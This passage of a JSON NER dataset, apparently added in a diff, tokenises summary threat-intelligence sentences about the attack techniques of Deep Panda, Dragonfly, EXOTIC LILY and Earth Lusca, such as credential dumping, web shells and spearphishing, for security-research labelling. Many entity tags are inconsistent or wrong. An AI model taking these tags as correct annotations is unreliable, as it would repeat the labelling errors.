"an", + "mspaint.lnk", + "shortcut", + "to", + "disk", + "which", + "launches", + "a", + "shell", + "script", + "that", + "downloads", + "and", + "executes", + "a", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deep", + "Panda", + "has", + "used", + "the", + "sticky-keys", + "technique", + "to", + "bypass", + "the", + "RDP", + "login", + "screen", + "on", + "remote", + "systems", + "during", + "intrusions." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deep", + "Panda", + "has", + "used", + "<code>-w", + "hidden</code>", + "to", + "conceal", + "PowerShell", + "windows", + "by", + "setting", + "the", + "WindowStyle", + "parameter", + "to", + "hidden." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deep", + "Panda", + "has", + "updated", + "and", + "modified", + "its", + "malware,", + "resulting", + "in", + "different", + "hash", + "values", + "that", + "evade", + "detection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deep", + "Panda", + "has", + "used", + "PowerShell", + "scripts", + "to", + "download", + "and", + "execute", + "programs", + "in", + "memory,", + "without", + "writing", + "to", + "disk." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deep", + "Panda", + "uses", + "the", + "Microsoft", + "Tasklist", + "utility", + "to", + "list", + "processes", + "running", + "on", + "systems." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deep", + "Panda", + "has", + "used", + "regsvr32.exe", + "to", + "execute", + "a", + "server", + "variant", + "of", + "Derusbi", + "in", + "victim", + "networks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deep", + "Panda", + "has", + "used", + "ping", + "to", + "identify", + "other", + "machines", + "of", + "interest." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deep", + "Panda", + "uses", + "net.exe", + "to", + "connect", + "to", + "network", + "shares", + "using", + "<code>net", + "use</code>", + "commands", + "with", + "compromised", + "credentials." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deep", + "Panda", + "uses", + "Web", + "shells", + "on", + "publicly", + "accessible", + "Web", + "servers", + "to", + "access", + "victim", + "networks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Deep", + "Panda", + "group", + "is", + "known", + "to", + "utilize", + "WMI", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "added", + "newly", + "created", + "accounts", + "to", + "the", + "administrators", + "group", + "to", + "maintain", + "elevated", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "compressed", + "data", + "into", + ".zip", + "files", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "attempted", + "to", + "brute", + "force", + "credentials", + "to", + "gain", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "collected", + "open", + "source", + "information", + "to", + "identify", + "relationships", + "between", + "organizations", + "for", + "targeting", + "purposes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "cleared", + "Windows", + "event", + "logs", + "and", + "other", + "logs", + "produced", + "by", + "tools", + "they", + "used,", + "including", + "system,", + "security,", + "terminal", + "services,", + "remote", + "services,", + "and", + "audit", + "logs.", + "The", + "actors", + "also", + "deleted", + "specific", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "I-Tool", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "the", + "command", + "line", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "placed", + "trojanized", + "installers", + "for", + "control", + "system", + "software", + "on", + "legitimate", + "vendor", + "app", + "stores." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "collected", + "data", + "from", + "local", + "victim", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "disabled", + "host-based", + "firewalls.", + "The", + "group", + "has", + "also", + "globally", + "opened", + "port", + "3389." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "batch", + "scripts", + "to", + "enumerate", + "users", + "on", + "a", + "victim", + "domain", + "controller." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "batch", + "scripts", + "to", + "enumerate", + "administrators", + "and", + "users", + "in", + "the", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "registered", + "domains", + "for", + "targeting", + "intended", + "victims." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "compromised", + "targets", + "via", + "strategic", + "web", + "compromise", + "(SWC)", + "utilizing", + "a", + "custom", + "exploit", + "kit." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "compromised", + "websites", + "to", + "redirect", + "traffic", + "and", + "to", + "host", + "exploit", + "kits." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "conducted", + "SQL", + "injection", + "attacks,", + "exploited", + "vulnerabilities", + "CVE-2019-19781", + "and", + "CVE-2020-0688", + "for", + "Citrix", + "and", + "MS", + "Exchange,", + "and", + "CVE-2018-13379", + "for", + "Fortinet", + "VPNs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "I-OffAct", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "exploited", + "CVE-2011-0611", + "in", + "Adobe", + "Flash", + "Player", + "to", + "gain", + "execution", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "exploited", + "a", + "Windows", + "Netlogon", + "vulnerability", + "(CVE-2020-1472)", + "to", + "obtain", + "access", + "to", + "Windows", + "Active", + "Directory", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "B-Features", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "VPNs", + "and", + "Outlook", + "Web", + "Access", + "(OWA)", + "to", + "maintain", + "access", + "to", + "victim", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "deleted", + "many", + "of", + "its", + "files", + "used", + "during", + "operations", + "as", + "part", + "of", + "cleanup,", + "including", + "removing", + "applications", + "and", + "deleting", + "screenshots." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "SMB", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "a", + "batch", + "script", + "to", + "gather", + "folder", + "and", + "file", + "names", + "from", + "victim", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "gathered", + "hashed", + "user", + "credentials", + "over", + "SMB", + "using", + "spearphishing", + "attachments", + "with", + "external", + "resource", + "links", + "and", + "by", + "modifying", + ".LNK", + "file", + "icon", + "resources", + "to", + "collect", + "credentials", + "from", + "virtualized", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "modified", + "the", + "Registry", + "to", + "hide", + "created", + "user", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "copied", + "and", + "installed", + "tools", + "for", + "operations", + "once", + "in", + "the", + "victim", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "dropped", + "and", + "executed", + "SecretsDump", + "to", + "dump", + "password", + "hashes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "created", + "accounts", + "on", + "victims,", + "including", + "administrator", + "accounts,", + "some", + "of", + "which", + "appeared", + "to", + "be", + "tailored", + "to", + "each", + "individual", + "staging", + "target." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "created", + "a", + "directory", + "named", + "\"out\"", + "in", + "the", + "user's", + "%AppData%", + "folder", + "and", + "copied", + "files", + "to", + "it." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "various", + "forms", + "of", + "spearphishing", + "in", + "attempts", + "to", + "get", + "users", + "to", + "open", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "created", + "accounts", + "disguised", + "as", + "legitimate", + "backup", + "and", + "service", + "accounts", + "as", + "well", + "as", + "an", + "email", + "administration", + "account." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "modified", + "the", + "Registry", + "to", + "perform", + "multiple", + "techniques", + "through", + "the", + "use", + "of", + "Reg." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "dropped", + "and", + "executed", + "SecretsDump", + "to", + "dump", + "password", + "hashes.", + "They", + "also", + "obtained", + "ntds.dit", + "from", + "domain", + "controllers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "identified", + "and", + "browsed", + "file", + "servers", + "in", + "the", + "victim", + "network,", + "sometimes", + ",", + "viewing", + "files", + "pertaining", + "to", + "ICS", + "or", + "Supervisory", + "Control", + "and", + "Data", + "Acquisition", + "(SCADA)", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "dropped", + "and", + "executed", + "tools", + "used", + "for", + "password", + "cracking,", + "including", + "Hydra", + "and", + "CrackMapExec." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "PowerShell", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "various", + "types", + "of", + "scripting", + "to", + "perform", + "operations,", + "including", + "Python", + "scripts.", + "The", + "group", + "was", + "observed", + "installing", + "Python", + "2.7", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "queried", + "the", + "Registry", + "to", + "identify", + "victim", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "added", + "the", + "registry", + "value", + "ntdll", + "to", + "the", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "moved", + "laterally", + "via", + "RDP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "accessed", + "email", + "accounts", + "using", + "Outlook", + "Web", + "Access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "likely", + "obtained", + "a", + "list", + "of", + "hosts", + "in", + "the", + "victim", + "environment." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "scheduled", + "tasks", + "to", + "automatically", + "log", + "out", + "of", + "created", + "accounts", + "every", + "8", + "hours", + "as", + "well", + "as", + "to", + "execute", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "performed", + "screen", + "captures", + "of", + "victims,", + "including", + "by", + "using", + "a", + "tool,", + "scr.exe", + "(which", + "matched", + "the", + "hash", + "of", + "ScreenUtil)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "dropped", + "and", + "executed", + "SecretsDump", + "to", + "dump", + "password", + "hashes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "compromised", + "legitimate", + "websites", + "to", + "host", + "C2", + "and", + "malware", + "modules." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "sent", + "emails", + "with", + "malicious", + "attachments", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "spearphishing", + "with", + "Microsoft", + "Office", + "attachments", + "to", + "enable", + "harvesting", + "of", + "user", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "spearphishing", + "with", + "PDF", + "attachments", + "containing", + "malicious", + "links", + "that", + "redirected", + "to", + "credential", + "harvesting", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "batch", + "scripts", + "to", + "enumerate", + "network", + "information,", + "including", + "information", + "about", + "trusts,", + "zones,", + "and", + "the", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "used", + "the", + "command", + "<code>query", + "user</code>", + "on", + "victim", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "injected", + "SMB", + "URLs", + "into", + "malicious", + "Word", + "spearphishing", + "attachments", + "to", + "initiate", + "Forced", + "Authentication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz,", + "CrackMapExec,", + "and", + "PsExec." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "compromised", + "user", + "credentials", + "and", + "used", + "valid", + "accounts", + "for", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "acquired", + "VPS", + "infrastructure", + "for", + "use", + "in", + "malicious", + "campaigns." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "scanned", + "targeted", + "systems", + "for", + "vulnerable", + "Citrix", + "and", + "Microsoft", + "Exchange", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "commonly", + "created", + "Web", + "shells", + "on", + "victims'", + "publicly", + "accessible", + "email", + "and", + "web", + "servers,", + "which", + "they", + "used", + "to", + "maintain", + "access", + "to", + "a", + "victim", + "network", + "and", + "download", + "additional", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Dragonfly", + "has", + "used", + "various", + "types", + "of", + "scripting", + "to", + "perform", + "operations,", + "including", + "batch", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "registered", + "domains", + "to", + "spoof", + "targeted", + "organizations", + "by", + "changing", + "the", + "top-level", + "domain", + "(TLD)", + "to", + "“.us”,", + "“.co”", + "or", + "“.biz”." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "created", + "e-mail", + "accounts", + "to", + "spoof", + "targeted", + "organizations." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "gathered", + "targeted", + "individuals'", + "e-mail", + "addresses", + "through", + "open", + "source", + "research", + "and", + "website", + "contact", + "forms." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "used", + "malicious", + "documents", + "containing", + "exploits", + "for", + "CVE-2021-40444", + "affecting", + "Microsoft", + "MSHTML." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "gained", + "execution", + "through", + "victims", + "clicking", + "on", + "malicious", + "LNK", + "files", + "contained", + "within", + "ISO", + "files,", + "which", + "can", + "execute", + "hidden", + "DLLs", + "within", + "the", + "ISO." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "used", + "malicious", + "links", + "to", + "lure", + "users", + "into", + "executing", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "searched", + "for", + "information", + "on", + "targeted", + "individuals", + "on", + "business", + "databases", + "including", + "RocketReach", + "and", + "CrunchBase." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "used", + "contact", + "forms", + "on", + "victim", + "websites", + "to", + "generate", + "phishing", + "e-mails." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "copied", + "data", + "from", + "social", + "media", + "sites", + "to", + "impersonate", + "targeted", + "individuals." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "established", + "social", + "media", + "profiles", + "to", + "mimic", + "employees", + "of", + "targeted", + "companies." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "conducted", + "an", + "e-mail", + "thread-hijacking", + "campaign", + "with", + "malicious", + "ISO", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Org", + "B-OffAct", + "O", + "O", + "B-Tool", + "B-Tool" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "relied", + "on", + "victims", + "to", + "open", + "malicious", + "links", + "in", + "e-mails", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "used", + "the", + "e-mail", + "notification", + "features", + "of", + "legitimate", + "file", + "sharing", + "services", + "for", + "spearphishing." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "uploaded", + "malicious", + "payloads", + "to", + "file-sharing", + "services", + "including", + "TransferNow,", + "TransferXL,", + "WeTransfer,", + "and", + "OneDrive." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "EXOTIC", + "LILY", + "has", + "used", + "file-sharing", + "services", + "including", + "WeTransfer,", + "TransferNow,", + "and", + "OneDrive", + "to", + "deliver", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "WinRAR", + "to", + "compress", + "stolen", + "files", + "into", + "an", + "archive", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "the", + "Fodhelper", + "UAC", + "bypass", + "technique", + "to", + "gain", + "elevated", + "privileges." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Earth", + "Lusca", + "has", + "used", + "a", + "<code>DCSync</code>", + "command", + "with", + "Mimikatz", + "to", + "retrieve", + "credentials", + "from", + "an", + "exploited", + "controller." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + 